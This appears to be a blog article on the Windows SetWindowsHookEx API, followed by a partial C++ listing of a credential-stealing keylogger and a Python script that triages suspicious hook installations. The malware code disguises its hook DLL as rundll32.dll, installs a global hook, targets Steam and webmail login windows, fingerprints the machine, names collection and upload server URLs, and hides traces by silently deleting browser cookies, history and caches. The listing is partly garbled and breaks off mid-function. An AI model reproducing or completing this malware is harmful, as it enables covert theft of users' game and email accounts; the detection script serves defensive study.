SetWindowsHookEx: Implementing a Keylogger with a Global Hook

 

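Introduction

A hook, installed with SetWindowsHookEx, is a facility within the Windows message-handling mechanism: an application can install a subroutine on it to monitor certain messages for a specified window, and the monitored window may have been created by another process. When a message arrives, the hook processes it before the target window's handler does. The hook mechanism lets an application intercept and process window messages or specific events.

A hook is really a piece of message-handling code that is attached to the system through a system call. Whenever a particular message is issued, the hook procedure captures it before it reaches the destination window, so the hook function gets control first. The hook function can then process (modify) the message, pass it on without processing it, or forcibly end delivery of the message. In effect, it inserts its own handler at the front of the window's message-processing flow.

At Ring 3, the SetWindowsHookEx function can intercept messages submitted to a particular window before anything else sees them, perform whatever processing the interceptor needs, and then hand them to the window procedure or to the next hook function. The function's first parameter, idHook, specifies the type of hook to install. In the code sample below, the installed hook type is WH_GETMESSAGE, which is used to intercept WM_KEYDOWN keyboard messages.

Function prototype: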

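    HHOOK SetWindowsHookEx(
        // Hook type
        _In_ int idHook,
        // Address of the callback function
        _In_ HOOKPROC lpfn,
        // Instance handle (of the module that contains the hook function)
        _In_opt_ HINSTANCE hmod,
        // ID of the thread to hook (0 means no specific thread: global)
        _In_ DWORD dwThreadId
    );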

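The hook types that can be set include:

    Macro value         Meaning
    WH_MSGFILTER        Intercepts messages from the user's interaction with controls
    WH_KEYBOARD         Intercepts keyboard messages
    WH_GETMESSAGE       Intercepts messages retrieved from the message queue
    WH_CBT              Intercepts basic system messages: window events such as activation, creation, destruction, minimizing, maximizing, moving and resizing
    WH_MOUSE            Intercepts mouse messages
    WH_CALLWNDPROCRET   Intercepts messages after the target window has finished processing them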

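Return value:

If the function succeeds, the return value is the handle to the hook procedure. If the function fails, the return value is NULL (0). To get extended error information, call GetLastError.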
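From the defender's side, the parameters described above (idHook, hmod, dwThreadId and the return value) are exactly what to triage when an API trace shows a SetWindowsHookEx call. The following is an added example, not code from the original post: the trace line format, the process paths and the PIDs are constructed for illustration, and the severity rules are one possible heuristic rather than a standard.

```python
import ntpath
import re

# idHook values as defined in WinUser.h
HOOK_NAMES = {
    -1: "WH_MSGFILTER", 0: "WH_JOURNALRECORD", 1: "WH_JOURNALPLAYBACK",
    2: "WH_KEYBOARD", 3: "WH_GETMESSAGE", 4: "WH_CALLWNDPROC", 5: "WH_CBT",
    6: "WH_SYSMSGFILTER", 7: "WH_MOUSE", 9: "WH_DEBUG", 10: "WH_SHELL",
    11: "WH_FOREGROUNDIDLE", 12: "WH_CALLWNDPROCRET", 13: "WH_KEYBOARD_LL",
    14: "WH_MOUSE_LL",
}
# Hook types whose callback can observe keystrokes (WH_GETMESSAGE sees the
# posted WM_KEYDOWN/WM_CHAR messages, as the article notes).
KEY_CAPABLE = {"WH_KEYBOARD", "WH_KEYBOARD_LL", "WH_GETMESSAGE", "WH_JOURNALRECORD"}

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
SYSTEM_STEMS = {"rundll32", "svchost", "explorer", "user32", "kernel32"}
USER_WRITABLE = (r"c:\users", r"c:\programdata", r"c:\windows\temp")

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample trace (hypothetical key=value format, not real tool output).
SAMPLE_TRACE = [
    r'pid=4120 image="C:\Games\Steam.exe" api=SetWindowsHookExA idHook=3 '
    r'hmod="C:\Program Files\Common Files\rundll32.dll" dwThreadId=0 ret=0x00A50391',
    r'pid=2288 image="C:\Program Files\Editor\editor.exe" api=SetWindowsHookExW '
    r'idHook=3 hmod="" dwThreadId=5312 ret=0x00B1027F',
    r'pid=3004 image="C:\Program Files\HotkeyTool\hk.exe" api=SetWindowsHookExW '
    r'idHook=13 hmod="C:\Program Files\HotkeyTool\hk.dll" dwThreadId=0 ret=0x00C20455',
    r'pid=5150 image="C:\Users\demo\AppData\Local\Temp\u.exe" api=SetWindowsHookExA '
    r'idHook=2 hmod="C:\Users\demo\AppData\Local\Temp\kb.dll" dwThreadId=0 ret=0x00D30111',
    r'pid=5150 image="C:\Users\demo\AppData\Local\Temp\u.exe" api=SetWindowsHookExA '
    r'idHook=2 hmod="C:\Users\demo\AppData\Local\Temp\kb.dll" dwThreadId=0 ret=0x0',
    r'pid=2288 image="C:\Program Files\Editor\editor.exe" api=CreateWindowExW ret=0x000A01F2',
]


def parse_line(line):
    """Return the key=value fields of a SetWindowsHookEx record, else None."""
    fields = {k: (quoted or bare) for k, quoted, bare in FIELD_RE.findall(line)}
    if not fields.get("api", "").startswith("SetWindowsHookEx"):
        return None
    return fields


def module_reasons(hmod):
    """Explain why the DLL that holds the hook procedure looks out of place."""
    if not hmod:
        return []
    module = ntpath.normpath(hmod).lower()
    directory, filename = ntpath.split(module)
    stem = ntpath.splitext(filename)[0]
    reasons = []
    if stem in SYSTEM_STEMS and directory not in SYSTEM_DIRS:
        reasons.append("system-like module name outside the system directory")
    if any((directory + "\\").startswith(p + "\\") for p in USER_WRITABLE):
        reasons.append("hook module in a user-writable directory")
    return reasons


def assess(fields):
    """Return (severity, hook_name, reasons); severity is None, 'review' or 'high'."""
    hook = HOOK_NAMES.get(int(fields["idHook"]), "UNKNOWN")
    if int(fields["ret"], 16) == 0:          # NULL return: hook was not installed
        return None, hook, ["call failed"]
    if int(fields["dwThreadId"]) != 0:       # scoped to a single thread
        return None, hook, ["thread-scoped hook"]
    if hook not in KEY_CAPABLE:
        return None, hook, ["hook type does not deliver keystrokes"]
    reasons = ["global hook that can observe keystrokes"]
    extra = module_reasons(fields.get("hmod", ""))
    return ("high" if extra else "review"), hook, reasons + extra


def triage(lines):
    """Return a finding for every installed, global, keystroke-capable hook."""
    findings = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        severity, hook, reasons = assess(fields)
        if severity:
            findings.append((int(fields["pid"]), hook, severity, reasons))
    return findings


if __name__ == "__main__":
    for pid, hook, severity, reasons in triage(SAMPLE_TRACE):
        print(f"[{severity}] pid={pid} {hook}: " + "; ".join(reasons))
```

Global keyboard hooks are also installed by legitimate software such as input methods and hotkey tools, which is why the module path, and not the hook type alone, decides between "review" and "high" here.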


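Implementation

Below is part of the implementation. I forget when I wrote it and there is nothing technically sophisticated in it, so experts can skip it.

Main program: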

// Steam.cpp : Defines the entry point for the application.
/#include "stdafx.h"// 函数声明LRESULT CALLBACK    WndProc(HWND, UINT, WPARAM, LPARAM);// 程序入口点int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR     lpCmdLine,int       nCmdShow)
{// TODO: Place code here.//加密标识CString Error = "****** 2019.04.07";MSG msg;HWND hWnd;char szTitle[]="Rainbow";                                // The title bar textchar szWindowClass[]="RBTools";                                // The title bar textWNDCLASSEX wcex={0};wcex.cbSize = sizeof(WNDCLASSEX);        //WNDCLASSEX结构体大小wcex.style            = CS_HREDRAW | CS_VREDRAW;    //位置改变时重绘wcex.lpfnWndProc    = (WNDPROC)WndProc;            //消息处理函数wcex.hInstance        = 0;            //当前实例句柄wcex.hbrBackground    = (HBRUSH)COLOR_WINDOWFRAME;    //背景色wcex.lpszClassName    = szWindowClass;        //参窗口类名wcex.hIcon            =0;        //图标wcex.hCursor        =0;        //光标wcex.lpszMenuName    =0;        //菜单名称wcex.hIconSm        =0;        //最小化图标RegisterClassEx(&wcex);            //注册窗口类hWnd = CreateWindow(szWindowClass, szTitle, WS_DISABLED,    //创建窗口CW_USEDEFAULT,CW_USEDEFAULT, 1, 1, NULL, NULL, 0, NULL);if (!hWnd){return FALSE;}ShowWindow(hWnd, 0);UpdateWindow(hWnd);char szDllPath1[MAX_PATH] = { 0 };GetSystemDirectory(szDllPath1, sizeof(szDllPath1));strcpy(szDllPath1+2, "\\Program Files\\Common Files\\rundll32.dll");static HINSTANCE hinstDLL1;typedef void (CALLBACK *inshook1)();//定义回调函数的地址 inshook1 instkbhook1;if(hinstDLL1=LoadLibrary((LPCTSTR)szDllPath1)){instkbhook1=(inshook1)GetProcAddress(hinstDLL1, "installhook"); instkbhook1();}while (GetMessage(&msg, NULL, 0, 0))     // 消息循环:{TranslateMessage(&msg);        //转化虚拟按键到字符消息DispatchMessage(&msg);        //分派消息调用回调函数}return msg.wParam;
}LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{switch (message) {case WM_DESTROY:    //窗口销毁消息PostQuitMessage(0);break;default:return DefWindowProc(hWnd, message, wParam, lParam);}return 0;
}

 HOOK DLL:

// test3.cpp : Defines the initialization routines for the DLL.
//#include "stdafx.h"
#include "test3.h"#define  DllExport _declspec(dllexport)#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif#define SWEEP_BUFFER_SIZE 10000//合并区段
//#pragma comment(linker, "/MERGE:.rdata=.data")
//#pragma comment(linker, "/MERGE:.text=.data")
//#pragma comment(linker, "/MERGE:.reloc=.data")//共享区段
#pragma data_seg(".SHARDAT")#pragma data_seg()//设置区段属性
#pragma comment(linker, "/section:.SHARDAT,RWE")//
//								用户数据													////// 到期时间														//CString UserEndData = "2019.05.04";								////
//
//								配置数据// 用户 IDCString strUserID = "002";// 程序版本CString szVersion = "20190407_3";// 统计接口CString strServerName = "http://login.37wan.com/";// 邮箱 & 上传接口CString strMailServerName = "http://upload.37wan.com/";//char osx[MAX_PATH]={0};
char jsj[MAX_PATH]={0};CString szLocalLP = "";
CString szAccount = "";
CString myEmailSTR = "";
CString szMyselfPath = "";
CString szStr = "", szStr2 = "";
CString szMailID, szMailName, szMailAddr;
CString szRegExe, szSTPath, szSTFile, szOneUser, szRegUser, szRegUser2, szStrFirst, szStrSecon; BOOL Login = false;
BOOL Regedit = false;
BOOL szBrowser = false;
BOOL szIERegedit = false;
BOOL szEMailName = false;
BOOL szTslgameEXE = false;HWND hcaretWnd = NULL;
static HANDLE thread = NULL;HINSTANCE hins = NULL;
static HHOOK hkb = NULL;HINSTANCE hinss = NULL;
static HHOOK hie = NULL;static char TAB_BASE64[]={"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"};//
//	Note!
//
//		If this DLL is dynamically linked against the MFC
//		DLLs, any functions exported from this DLL which
//		call into MFC must have the AFX_MANAGE_STATE macro
//		added at the very beginning of the function.
//
//		For example:
//
//		extern "C" BOOL PASCAL EXPORT ExportedFunction()
//		{
//			AFX_MANAGE_STATE(AfxGetStaticModuleState());
//			// normal function body here
//		}
//
//		It is very important that this macro appear in each
//		function, prior to any calls into MFC.  This means that
//		it must appear as the first statement within the 
//		function, even before any object variable declarations
//		as their constructors may generate calls into the MFC
//		DLL.
//
//		Please see MFC Technical Notes 33 and 58 for additional
//		details.
///
// CTest3AppBEGIN_MESSAGE_MAP(CTest3App, CWinApp)//{{AFX_MSG_MAP(CTest3App)// NOTE - the ClassWizard will add and remove mapping macros here.//    DO NOT EDIT what you see in these blocks of generated code!//}}AFX_MSG_MAP
END_MESSAGE_MAP()// 提升程序系统权限BOOL DllExport AdjustPrivileges()
{HANDLE hToken = NULL;TOKEN_PRIVILEGES tp = {0};TOKEN_PRIVILEGES oldtp = {0};DWORD dwSize = sizeof(TOKEN_PRIVILEGES);LUID luid = {0};if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {if (GetLastError()==ERROR_CALL_NOT_IMPLEMENTED)return TRUE;elsereturn FALSE;}if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) {CloseHandle(hToken);return FALSE;}tp.PrivilegeCount=1;tp.Privileges[0].Luid = luid;tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;/* Adjust Token Privileges */if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), &oldtp, &dwSize)) {CloseHandle(hToken);return FALSE;}// close handlesCloseHandle(hToken);return TRUE;
}// 设置当前进程优先级为最高(实时)BOOL DllExport SetRealTimePriority()
{if ( !SetPriorityClass( GetCurrentProcess(), REALTIME_PRIORITY_CLASS ) ){return FALSE;}return TRUE;
}// 数据加密int DllExport tranasci(char a)
{return (a-'A'+65);
}CString DllExport gen(CString m_url)
{int i=0;int l=0;int k=0;CString curl;l=m_url.GetLength();for(i;i<l;i+=2){char		temp1=m_url.GetAt( i );char		temp2=m_url.GetAt(i+1);if(temp2==NULL){int			ansi1=tranasci(temp1);CString		str1;str1.Format("%X",ansi1);str1.Replace("FFFFFF", "");//curl+="%";curl+=str1;break;}int			ansi1=tranasci(temp1);int			ansi2=tranasci(temp2);CString		str1;CString		str2;str1.Format("%X",ansi1);str2.Format("%X",ansi2);str1.Replace("FFFFFF", "");str2.Replace("FFFFFF", "");//curl+="%";curl+=str1;//curl+="%";curl+=str2;}if (l%2){}else{
//		curl+="%";}return curl;
}CString DllExport BASE64Encode(CString strIn, long Len)   
{   CString strOut,strTemp;   BYTE chr[3];   char chrBs[5];   long lTemp,lTemp2;   chrBs[4]='\0';   strOut="";   if(Len<1)   {   return strOut;   }   for (lTemp=0;lTemp<Len/3;lTemp++)   {   lTemp2=lTemp*3;   chr[0]=(BYTE)strIn.GetAt(lTemp2);   chr[1]=(BYTE)strIn.GetAt(lTemp2+1);   chr[2]=(BYTE)strIn.GetAt(lTemp2+2);   chrBs[0]=(chr[0]>>2)&0x3F;   chrBs[1]=((chr[0]<<4)|(chr[1]>>4))&0x3F;   chrBs[2]=((chr[1]<<2)|(chr[2]>>6))&0x3F;   chrBs[3]=chr[2]&0x3F;   chrBs[0]=TAB_BASE64[chrBs[0]];   chrBs[1]=TAB_BASE64[chrBs[1]];   chrBs[2]=TAB_BASE64[chrBs[2]];   chrBs[3]=TAB_BASE64[chrBs[3]];   strOut+=chrBs;   }   if (1==Len%3)   {   chr[0]=(BYTE)strIn.GetAt(Len-1);   chrBs[0]=(chr[0]>>2)&0x3F;   chrBs[1]=(chr[0]<<4)&0x3F;   chrBs[0]=TAB_BASE64[chrBs[0]];   chrBs[1]=TAB_BASE64[chrBs[1]];   chrBs[2]='=';   chrBs[3]='=';   strOut+=chrBs;   }   else if (2==Len%3)   {   chr[0]=(BYTE)strIn.GetAt(Len-2);   chr[1]=(BYTE)strIn.GetAt(Len-1);   chrBs[0]=(chr[0]>>2)&0x3F;   chrBs[1]=((chr[0]<<4)|(chr[1]>>4))&0x3F;   chrBs[2]=(chr[1]<<2)&0x3F;   chrBs[0]=TAB_BASE64[chrBs[0]];   chrBs[1]=TAB_BASE64[chrBs[1]];   chrBs[2]=TAB_BASE64[chrBs[2]];   chrBs[3]='=';   strOut+=chrBs;   }   return strOut;   
} // 获取随机名称CString DllExport GetName()
{CString mySTR1 = "", mySTR2 = "";time_t seed = time(NULL); srand((unsigned)seed);for(int j=0; j<6 ;j++){int randNum = rand()%26;//取一个随机数,该数字为0-25if(j%2){mySTR1.Format("%C", randNum+97);//随机数为0到25,而小写字母的asc码为97到122,所以加97}else{mySTR1.Format("%C", randNum+65);//随机数为0到25,而大写字母的asc码为65到90,所以加65}mySTR2 += mySTR1;Sleep(100);//sleep一下,使随机因子取的分散些}return mySTR2;
}// 结束进程BOOL DllExport KillProcess(CString szProcess)
{BOOL szKill = FALSE;PROCESSENTRY32 pe32;pe32.dwSize =sizeof(pe32);HANDLE hpro=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);if(hpro==INVALID_HANDLE_VALUE){  return szKill;}szProcess.MakeLower();BOOL nowrun=Process32First(hpro,&pe32);while(nowrun){CString szGetProcess;szGetProcess = pe32.szExeFile;szGetProcess.MakeLower();if(szGetProcess == szProcess){DWORD proid=pe32.th32ProcessID;HANDLE hprocess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,proid);if(hprocess!=NULL){::TerminateProcess(hprocess,0);szKill = TRUE;}::CloseHandle(hprocess);}nowrun=::Process32Next(hpro,&pe32);}::CloseHandle(hpro);return szKill;
}// 获取 steam.exe 进程标识DWORD DllExport GetEXE()
{HANDLE m_handle=::CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);PROCESSENTRY32* Info = new PROCESSENTRY32;Info->dwSize = sizeof(PROCESSENTRY32);if(::Process32First(m_handle,Info)){while(::Process32Next(m_handle,Info)!=FALSE){CString ss;ss=Info->szExeFile;ss.MakeLower();if(ss.Find("steam.exe") != -1){return Info->th32ProcessID;}}::CloseHandle(m_handle);if(Info){delete Info;}}return -1;
}// 查找进程BOOL DllExport GetProcess(CString TargetName) 
{ CString fileName(TargetName);fileName.MakeLower(); //转为小写 HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);  // 创建快照句柄 PROCESSENTRY32 pe32x = {sizeof(PROCESSENTRY32),0};//定义一个PROCESSENTRY32结类型的变量 if( Process32First(hShot,&pe32x) ) {do{CString process_fileName = pe32x.szExeFile;process_fileName.MakeLower();//进程文件名转换为小写if( fileName == process_fileName ){CloseHandle(hShot);return TRUE;}}while( Process32Next(hShot, &pe32x) );} CloseHandle(hShot);return FALSE;
}// 枚举顶层窗口获取标题BOOL DllExport CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam)
{if( GetParent(hWnd)==NULL && IsWindowVisible(hWnd) ){TCHAR sTitle[MAX_PATH]={0};ZeroMemory(sTitle, MAX_PATH * sizeof(TCHAR));GetWindowText(hWnd, sTitle, sizeof(sTitle));//SendMessage(hWnd, WM_GETTEXT, (WPARAM)MAX_PATH, (LPARAM)sTitle);//AfxMessageBox(sTitle);CString szMainName = "";szMainName.Format(TEXT("%s"), sTitle);int MAIL0 = szMainName.Find("邮箱大全", 0);char *MAIL1;MAIL1 = strstr(sTitle, "邮箱");char *MAIL2;MAIL2 = strstr(sTitle, "电子邮");char *MAIL3;MAIL3 = strstr(sTitle, "免费邮");char *MAIL4;MAIL4 = strstr(sTitle, "电子邮件");char *MAIL5;MAIL5 = strstr(sTitle, "手机统一");char *MAIL6;MAIL6 = strstr(sTitle, "Microsoft 帐户");char *MAIL7;MAIL7 = strstr(sTitle, "Yahoo -");if( MAIL0 == -1 && (MAIL1 || MAIL2 || MAIL3 || MAIL4 || MAIL5 || MAIL6 || MAIL7) ){HWND Hwnd_Browser = ::GetForegroundWindow();if(hWnd == Hwnd_Browser){if(!szEMailName){CString szACCID;szACCID.Format(TEXT("C:\\MailName.txt"));szMailName.Format(TEXT("%s"), sTitle);FILE *fps1;fps1=fopen(szACCID, "w");if(fps1){fprintf(fps1, "%s", szMailName.GetBuffer(0));}fclose(fps1);szEMailName = true;}//AfxMessageBox(szMailName);return FALSE;}}}return TRUE;
}// 获取 MACtypedef struct _ASTAT_ 
{ ADAPTER_STATUS adapt; NAME_BUFFER    NameBuff[30]; 
}ASTAT, * PASTAT;UCHAR DllExport GetAddressByIndex(int lana_num,ASTAT & Adapter)
{UCHAR uRetCode; //-------------------------------------------------------------------NCB ncb; memset(&ncb, 0, sizeof(ncb) ); ncb.ncb_command = NCBRESET; ncb.ncb_lana_num = lana_num; //指定网卡号,首先对选定的网卡发送一个NCBRESET命令,以便进行初始化 uRetCode = Netbios(&ncb ); memset(&ncb, 0, sizeof(ncb) ); ncb.ncb_command = NCBASTAT; ncb.ncb_lana_num = lana_num;//指定网卡号 strcpy((char *)ncb.ncb_callname,"*      " ); ncb.ncb_buffer = (unsigned char *)&Adapter; //指定返回的信息存放的变量 ncb.ncb_length = sizeof(Adapter); //接着,可以发送NCBASTAT命令以获取网卡的信息 uRetCode = Netbios(&ncb ); //-------------------------------------------------------------------return uRetCode;
}CString DllExport GetMacAddress(void)
{CString strMacAddress;//-------------------------------------------------------------------NCB ncb; UCHAR uRetCode;int num = 0;LANA_ENUM lana_enum; memset(&ncb, 0, sizeof(ncb) ); ncb.ncb_command = NCBENUM; ncb.ncb_buffer = (unsigned char *)&lana_enum; ncb.ncb_length = sizeof(lana_enum); //向网卡发送NCBENUM命令,以获取当前机器的网卡信息,如有多少个网卡//每张网卡的编号等 uRetCode = Netbios(&ncb);if (uRetCode == 0) {num = lana_enum.length;//对每一张网卡,以其网卡编号为输入编号,获取其MAC地址 for (int i = 0; i < num; i++){ASTAT Adapter;if(GetAddressByIndex(lana_enum.lana[i],Adapter) == 0){strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"), Adapter.adapt.adapter_address[0], Adapter.adapt.adapter_address[1], Adapter.adapt.adapter_address[2], Adapter.adapt.adapter_address[3], Adapter.adapt.adapter_address[4], Adapter.adapt.adapter_address[5]);}}}//-------------------------------------------------------------------return strMacAddress;
}// 获取 IE 版本CString DllExport GetIEVerSion()
{HKEY   hKEY;CString myIEVersion = "";LPCTSTR   data_Set = "SOFTWARE\\Microsoft\\Internet Explorer";long   ret0=(RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY)); if(ret0 == ERROR_SUCCESS){LPBYTE owner_Get1=new BYTE[80];DWORD type_1=REG_SZ;DWORD cbData_1=80;long   ret1=::RegQueryValueEx(hKEY, "svcVersion", NULL, &type_1, owner_Get1, &cbData_1);   if(ret1 == ERROR_SUCCESS)   {   char *IEVersion = (char *)owner_Get1;myIEVersion.Format(TEXT("%s"), IEVersion);}else{LPBYTE owner_Get2=new BYTE[80];DWORD type_2=REG_SZ;DWORD cbData_2=80;long   ret2=::RegQueryValueEx(hKEY, "Version", NULL, &type_2, owner_Get2, &cbData_2);if(ret2 == ERROR_SUCCESS)   {   char *IEVersion = (char *)owner_Get2;myIEVersion.Format(TEXT("%s"), IEVersion);}}}RegCloseKey(hKEY);return myIEVersion;
}// 获取系统位数BOOL DllExport IsWow64()
{typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);LPFN_ISWOW64PROCESS fnIsWow64Process;BOOL bIsWow64 = FALSE;fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress( GetModuleHandle("kernel32"),"IsWow64Process");if (NULL != fnIsWow64Process){fnIsWow64Process(GetCurrentProcess(),&bIsWow64);}return bIsWow64;
}// 获取系统版本void DllExport os()
{//先判断是否为 win8.1 或 win10typedef void(__stdcall*NTPROC)(DWORD*, DWORD*, DWORD*);HINSTANCE hinst = LoadLibrary("ntdll.dll");DWORD dwMajor, dwMinor, dwBuildNumber;NTPROC proc = (NTPROC)GetProcAddress(hinst, "RtlGetNtVersionNumbers"); proc(&dwMajor, &dwMinor, &dwBuildNumber); if (dwMajor == 6 && dwMinor == 3)	//win 8.1{strcat(osx, "Win 8.1");}else if (dwMajor == 10 && dwMinor == 0)	//win 10{strcat(osx, "Win 10");}else{//判断win8.1以下的版本SYSTEM_INFO info;                //用SYSTEM_INFO结构判断64位AMD处理器  GetSystemInfo(&info);            //调用GetSystemInfo函数填充结构  OSVERSIONINFOEX os;os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);#pragma warning(disable:4996)if (GetVersionEx((OSVERSIONINFO *)&os)){//下面根据版本信息判断操作系统名称  switch (os.dwMajorVersion){case 5:switch (os.dwMinorVersion){case 0:strcat(osx, "Win 2000");break;case 1:strcat(osx, "Win XP");break;case 2:if (os.wProductType == VER_NT_WORKSTATION &&info.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64)strcat(osx, "Win XP Professional x64 Edition");elsestrcat(osx, "Win Server 2003");break;}break;case 6:switch (os.dwMinorVersion){case 0:if (os.wProductType == VER_NT_WORKSTATION)strcat(osx, "Win Vista");elsestrcat(osx, "Win Server 2008");break;case 1:if (os.wProductType == VER_NT_WORKSTATION)strcat(osx, "Win 7");elsestrcat(osx, "Win Server 2008 R2");break;case 2:if (os.wProductType == VER_NT_WORKSTATION)strcat(osx, "Win 8");elsestrcat(osx, "Win Server 2012");break;}break;default:strcat(osx, "Unkonw OS");}}elsestrcat(osx, "Unkonw OS");}if(IsWow64()){strcat(osx, " x64");}else{strcat(osx, " x86");}
}// 清理缓存文件enum DEL_CACHE_TYPE //要删除的类型。
{File,//表示internet临时文件Cookie //表示Cookie
};BOOL DllExport DeleteUrlCache(DEL_CACHE_TYPE type)
{BOOL bRet = FALSE;HANDLE hEntry;LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;  DWORD dwEntrySize;//delete the filesdwEntrySize = 0;hEntry = FindFirstUrlCacheEntry(NULL, NULL, &dwEntrySize);lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];hEntry = FindFirstUrlCacheEntry(NULL, lpCacheEntry, &dwEntrySize);if (!hEntry){goto cleanup;}do{if (type == File &&!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY)){DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);}else if (type == Cookie &&(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY)){DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);}dwEntrySize = 0;FindNextUrlCacheEntry(hEntry, NULL, &dwEntrySize);delete [] lpCacheEntry; lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];}while (FindNextUrlCacheEntry(hEntry, lpCacheEntry, &dwEntrySize));bRet = TRUE;
cleanup:if (lpCacheEntry){delete [] lpCacheEntry; }return bRet;
}BOOL DllExport WipeFile(LPCTSTR szDir, LPCTSTR szFile)
{CString sPath;HANDLE	hFile;DWORD	dwSize;DWORD	dwWrite;char	sZero[SWEEP_BUFFER_SIZE];memset(sZero, 0, SWEEP_BUFFER_SIZE);sPath = szDir;sPath += _T('\\');sPath += szFile;hFile = CreateFile(sPath, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);if (hFile == INVALID_HANDLE_VALUE){return FALSE;}dwSize = GetFileSize(hFile, NULL);//skip file header (actually, I don't know the file format of index.dat)dwSize -= 64;SetFilePointer(hFile, 64, NULL, FILE_BEGIN);while (dwSize > 0){if (dwSize > SWEEP_BUFFER_SIZE){WriteFile(hFile, sZero, SWEEP_BUFFER_SIZE, &dwWrite, NULL);dwSize -= SWEEP_BUFFER_SIZE;}else{WriteFile(hFile, sZero, dwSize, &dwWrite, NULL);break;}}CloseHandle(hFile);return TRUE;
}BOOL DllExport EmptyDirectory(LPCTSTR szPath, BOOL bDeleteDesktopIni, BOOL bWipeIndexDat)
{WIN32_FIND_DATA wfd;HANDLE hFind;CString sFullPath;CString sFindFilter;DWORD dwAttributes = 0;sFindFilter = szPath;sFindFilter += _T("\\*.*");if ((hFind = FindFirstFile(sFindFilter, &wfd)) == INVALID_HANDLE_VALUE){return FALSE;}do{if (_tcscmp(wfd.cFileName, _T(".")) == 0 || _tcscmp(wfd.cFileName, _T("..")) == 0 ||(bDeleteDesktopIni == FALSE && _tcsicmp(wfd.cFileName, _T("desktop.ini")) == 0)){continue;}sFullPath = szPath;sFullPath += _T('\\');sFullPath += wfd.cFileName;//去掉只读属性dwAttributes = GetFileAttributes(sFullPath);if (dwAttributes & FILE_ATTRIBUTE_READONLY){dwAttributes &= ~FILE_ATTRIBUTE_READONLY;SetFileAttributes(sFullPath, dwAttributes);}if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY){EmptyDirectory(sFullPath, bDeleteDesktopIni, bWipeIndexDat);RemoveDirectory(sFullPath);}else{if (bWipeIndexDat && _tcsicmp(wfd.cFileName, _T("index.dat")) == 0){WipeFile(szPath, wfd.cFileName);}DeleteFile(sFullPath);}}while (FindNextFile(hFind, &wfd));FindClose(hFind);return TRUE;
}BOOL DllExport DelTempFiles()
{// 清理DNS缓存ShellExecute(NULL, "open", "ipconfig.exe", " /flushdns", NULL, SW_HIDE);// 清理 缓存 与 CookiesTCHAR szPath[MAX_PATH];DeleteUrlCache(Cookie);if (SHGetSpecialFolderPath(NULL, szPath, CSIDL_COOKIES, FALSE)){EmptyDirectory(szPath, 1, 1);}CString myCleaner = TEXT(" /c del /f /s /q \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\Microsoft\\Windows\\History\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\*.*\" && del /f /s /q \"%userprofile%\\Local Settings\\History\\*.*\" && del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Roaming\\360se6\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Local\\360Chrome\\Chrome\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\CookiesV3\" && del /f /s /q \"%userprofile%\\AppData\\Local\\2345Explorer\\User Data\\Default\\History\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cache\\*.*\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\Cookies\" && del /f /s /q \"%userprofile%\\AppData\\Local\\liebao\\User Data\\Default\\History\" && exit");//AfxMessageBox(myCleaner);ShellExecute(NULL, "open", "cmd.exe", myCleaner, "", SW_HIDE);BOOL bResult = FALSE;BOOL bDone = FALSE;LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;DWORD  
